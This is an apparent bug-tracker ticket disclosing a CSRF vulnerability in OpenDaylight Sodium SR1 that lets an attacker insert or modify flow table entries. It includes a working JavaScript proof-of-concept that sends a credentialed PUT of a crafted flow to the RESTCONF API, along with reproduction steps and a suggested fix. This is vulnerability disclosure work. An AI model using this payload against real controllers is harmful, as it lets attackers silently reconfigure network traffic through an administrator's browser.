Uploaded image for project: 'aaa'
  1. aaa
  2. AAA-197

[CSRF] Attacker can insert or modify the entry of flow table

XMLWordPrintable

    • Icon: Bug Bug
    • Resolution: Duplicate
    • Icon: High High
    • 0.16.0
    • Sodium SR1
    • General
    • None

    • Browsers Verified In:

      • [Firefox 71.0]

       

      Brief of this vulnerability

      Attacker can insert or modify the entry of flow table. This attack was verified on Sodium-SR1. Although not tested in other versions, it is expected to be applicable.

      Description

      HI I found csrf bug on flow table inserting and modifying. It can be dangerous for admin. The victim admin can insert the attacker's intended flow into the flow table.

      CSRF POC is below : 

      <meta charset="utf-8">
<script  src="http://code.jquery.com/jquery-latest.min.js"></script>
 
<script language ="javascript" type = "text/javascript" >
var createCORSRequest = function(method, url) {
  var xhr = new XMLHttpRequest();
  if ("withCredentials" in xhr) {
    // Most browsers.
    xhr.open(method, url, true);
  } else if (typeof XDomainRequest != "undefined") {
    // IE8 & IE9
    xhr = new XDomainRequest();
    xhr.open(method, url);
  } else {
    // CORS not supported.
    xhr = null;
  }
  return xhr;
};
 
var url = 'http://127.0.0.1:8181/restconf/config/opendaylight-inventory:nodes/node/openflow:1/table/0/flow/1';
var method = 'PUT';
var xhr = createCORSRequest(method, url);
 
xhr.onload = function() {
  // Success code goes here.
};
 
xhr.onerror = function() {
  // Error code goes here.
};
 
xhr.setRequestHeader('Content-Type', 'application/xml')
xhr.withCredentials = true;
xhr.send('<?xml version="1.0" encoding="UTF-8" standalone="no"?><flow xmlns="urn:opendaylight:flow:inventory"><priority>4</priority><flow-name>asdfa</flow-name><match><ethernet-match><ethernet-type><type>2048</type></ethernet-type></ethernet-match><ipv4-destination>10.0.0.1/24</ipv4-destination></match><id>1</id><table_id>0</table_id><instructions><instruction><order>0</order><apply-actions><action><order>0</order><dec-nw-ttl/></action></apply-actions></instruction></instructions></flow>');
 
</script>

      This attack is an example because ODL itself is vulnerable to CSRF attacks.

      In fact, for any function that sets ODL controller using REST API, we can make arbitrary malicious settings using CSRF attack.

      If an administrator accesses an arbitrary web page created by an attacker, Floodlight can be configured with arbitrary settings

      To Reproduce:

      1. Administrator's benign access
      2. Administrator logged in to the dlux gui via the browser with admin account
      3. Administrator accesses ODL controller using REST API in browser with admin account
      1. Administrator visits the malicious webpage

      Solution:

      • Check CSRF tokens in all request.

        1. 스크린샷 2020-03-06 오후 2.44.48.png
          스크린샷 2020-03-06 오후 2.44.48.png
          2.91 MB

            rovarga Robert Varga
            seongil-wi Seongil Wi
            Votes:
            0 Vote for this issue
            Watchers:
            3 Start watching this issue

              Created:
              Updated:
              Resolved:

                Estimated:
                Original Estimate - 4 hours
                4h
                Remaining:
                Remaining Estimate - 4 hours
                4h
                Logged:
                Time Spent - Not Specified
                Not Specified